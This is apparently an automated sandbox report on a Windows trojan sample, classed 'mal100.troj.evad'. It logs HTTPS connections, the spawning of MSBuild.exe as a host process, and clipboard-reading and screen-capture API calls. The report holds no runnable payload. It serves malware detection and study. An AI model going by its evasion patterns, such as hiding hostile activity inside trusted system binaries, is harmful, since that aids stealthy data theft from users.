Source: unknown	Network traffic detected: HTTP traffic on port 49844 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49793 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49850 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49831 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49798
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown	Network traffic detected: HTTP traffic on port 49814 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49856 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49825 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49808 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49821
Source: unknown	Network traffic detected: HTTP traffic on port 49865 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49842 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49859 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49833 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49819
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49818
Source: unknown	Network traffic detected: HTTP traffic on port 49799 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49810 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49817
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49815
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49814
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49813
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49812
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49811
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49810
Source: unknown	Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49794 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49827 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49809
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49808
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49807
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49806
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49805
Source: unknown	Network traffic detected: HTTP traffic on port 49848 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49804
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49803
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49802
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49801
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49800
Source: unknown	Network traffic detected: HTTP traffic on port 49783 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49838 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49821 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49815 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49854 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49809 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49860 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49843 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49804 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49832 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443

Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.6:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.6:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.253.72:443 -> 192.168.2.6:49715 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.253.72:443 -> 192.168.2.6:49770 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.253.72:443 -> 192.168.2.6:49772 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.253.72:443 -> 192.168.2.6:49771 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.253.72:443 -> 192.168.2.6:49807 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.253.72:443 -> 192.168.2.6:49808 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.253.72:443 -> 192.168.2.6:49809 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.253.72:443 -> 192.168.2.6:49810 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.253.72:443 -> 192.168.2.6:49863 version: TLS 1.2

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 2_2_00438720 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

2_2_00438720

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 2_2_00438720 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

2_2_00438720

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 2_2_004390EE GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,

2_2_004390EE

Source: C:\Users\user\Desktop\TuQlz67byH.exe	Code function: 0_2_00EC2021	0_2_00EC2021
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Code function: 0_2_00EF2088	0_2_00EF2088
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Code function: 0_2_00EEE1CF	0_2_00EEE1CF
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Code function: 0_2_00F1E1A8	0_2_00F1E1A8
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Code function: 0_2_00F1E132	0_2_00F1E132
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Code function: 0_2_00EF2123	0_2_00EF2123
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Code function: 0_2_00EEE27B	0_2_00EEE27B
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Code function: 0_2_00EF8278	0_2_00EF8278
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Code function: 0_2_00EEE272	0_2_00EEE272
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Code function: 0_2_00EF0488	0_2_00EF0488
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Code function: 0_2_00EEE455	0_2_00EEE455
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Code function: 0_2_00EF45F4	0_2_00EF45F4
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Code function: 0_2_00EEE527	0_2_00EEE527
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Code function: 0_2_00F28798	0_2_00F28798
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Code function: 0_2_00F1E738	0_2_00F1E738
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Code function: 0_2_00F34988	0_2_00F34988
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Code function: 0_2_00ECCAF2	0_2_00ECCAF2
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Code function: 0_2_00EF4AC8	0_2_00EF4AC8
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Code function: 0_2_00F0AA47	0_2_00F0AA47
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Code function: 0_2_00EF8D88	0_2_00EF8D88
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Code function: 0_2_00F1AD84	0_2_00F1AD84
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Code function: 0_2_00EF6D40	0_2_00EF6D40
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Code function: 0_2_00F34E98	0_2_00F34E98
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Code function: 0_2_00F36FA8	0_2_00F36FA8
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Code function: 0_2_00EFEF08	0_2_00EFEF08
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Code function: 0_2_00F30F18	0_2_00F30F18
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Code function: 0_2_00EFB078	0_2_00EFB078
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Code function: 0_2_00EF71D8	0_2_00EF71D8
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Code function: 0_2_00F251A8	0_2_00F251A8
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Code function: 0_2_00EC729C	0_2_00EC729C
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Code function: 0_2_00F233C8	0_2_00F233C8
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Code function: 0_2_00EDD39B	0_2_00EDD39B
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Code function: 0_2_00F094C8	0_2_00F094C8
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Code function: 0_2_00EF5468	0_2_00EF5468
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Code function: 0_2_00F2B778	0_2_00F2B778
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Code function: 0_2_00ED572C	0_2_00ED572C
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Code function: 0_2_00EF7728	0_2_00EF7728
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Code function: 0_2_00F31918	0_2_00F31918
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Code function: 0_2_00F19BA8	0_2_00F19BA8
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Code function: 0_2_00EDBB36	0_2_00EDBB36
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Code function: 0_2_00ED3C92	0_2_00ED3C92
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Code function: 0_2_00EF7DE8	0_2_00EF7DE8
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Code function: 0_2_00EC1D79	0_2_00EC1D79
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Code function: 0_2_00ECFEF0	0_2_00ECFEF0
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Code function: 0_2_00EEDED8	0_2_00EEDED8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_00410228	2_2_00410228
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_00444040	2_2_00444040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_00401000	2_2_00401000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_00412030	2_2_00412030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_0044A0D0	2_2_0044A0D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_00405160	2_2_00405160
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_004071F0	2_2_004071F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_0040E1A0	2_2_0040E1A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_004382D0	2_2_004382D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_004312D0	2_2_004312D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_004012F7	2_2_004012F7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_0040A300	2_2_0040A300
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_004323E0	2_2_004323E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_0040B3A0	2_2_0040B3A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_004013A3	2_2_004013A3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_0042C470	2_2_0042C470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_004364F0	2_2_004364F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_00414487	2_2_00414487
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_0041049B	2_2_0041049B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_0041C5F0	2_2_0041C5F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_00408590	2_2_00408590
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_004035B0	2_2_004035B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_0040164F	2_2_0040164F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_00448652	2_2_00448652
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_0043F620	2_2_0043F620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_004486F0	2_2_004486F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_0040A850	2_2_0040A850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_00431860	2_2_00431860
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_0043B8C0	2_2_0043B8C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_0043E8A0	2_2_0043E8A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_0042098B	2_2_0042098B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_004489A0	2_2_004489A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_00444A40	2_2_00444A40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_00448A80	2_2_00448A80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_00447AB0	2_2_00447AB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_0041DB6F	2_2_0041DB6F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_00407BF0	2_2_00407BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_00448C02	2_2_00448C02
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_0042CCD0	2_2_0042CCD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_00446CBF	2_2_00446CBF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_00428D62	2_2_00428D62
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_0042FD10	2_2_0042FD10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_0042DD29	2_2_0042DD29
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_0042AE57	2_2_0042AE57
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_00448E70	2_2_00448E70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_00414E2A	2_2_00414E2A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_0040BEB0	2_2_0040BEB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_00416EBF	2_2_00416EBF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_0040AF10	2_2_0040AF10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_00447FC0	2_2_00447FC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_00408FD0	2_2_00408FD0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 0040CAA0 appears 48 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 0041D300 appears 152 times
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Code function: String function: 00EC7B80 appears 49 times
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Code function: String function: 00EF9978 appears 93 times
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Code function: String function: 00F0A1D8 appears 152 times

Source: C:\Users\user\Desktop\TuQlz67byH.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3548 -s 288

Source: TuQlz67byH.exe, 00000000.00000000.2097754236.0000000000F48000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameproquota.exej% vs TuQlz67byH.exe
Source: TuQlz67byH.exe	Binary or memory string: OriginalFilenameproquota.exej% vs TuQlz67byH.exe

Source: TuQlz67byH.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: TuQlz67byH.exe

Static PE information: Section: .data ZLIB complexity 0.9912368881118881

Source: classification engine

Classification label: mal100.troj.evad.winEXE@6/5@10/2

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 2_2_00438220 CoCreateInstance,

2_2_00438220

Source: C:\Windows\SysWOW64\WerFault.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3548

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\0186fbf7-0d2f-40dc-89b1-b870c16a3a2c

Jump to behavior

Source: C:\Users\user\Desktop\TuQlz67byH.exe	Command line argument: MZx	0_2_00EC2021
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Command line argument: MZx	0_2_00EC2021
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Command line argument: MZx	0_2_00EC2021

Source: TuQlz67byH.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\TuQlz67byH.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\TuQlz67byH.exe "C:\Users\user\Desktop\TuQlz67byH.exe"
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3548 -s 288
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior

Source: C:\Users\user\Desktop\TuQlz67byH.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dpapi.dll	Jump to behavior

Source: TuQlz67byH.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: TuQlz67byH.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: TuQlz67byH.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: TuQlz67byH.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: TuQlz67byH.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: TuQlz67byH.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: TuQlz67byH.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: TuQlz67byH.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source: TuQlz67byH.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: TuQlz67byH.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: TuQlz67byH.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: TuQlz67byH.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: TuQlz67byH.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\TuQlz67byH.exe	Code function: 0_2_00EC71AD push ecx; ret		0_2_00EC71C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_0044F23B push edx; ret		2_2_0044F24B

Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
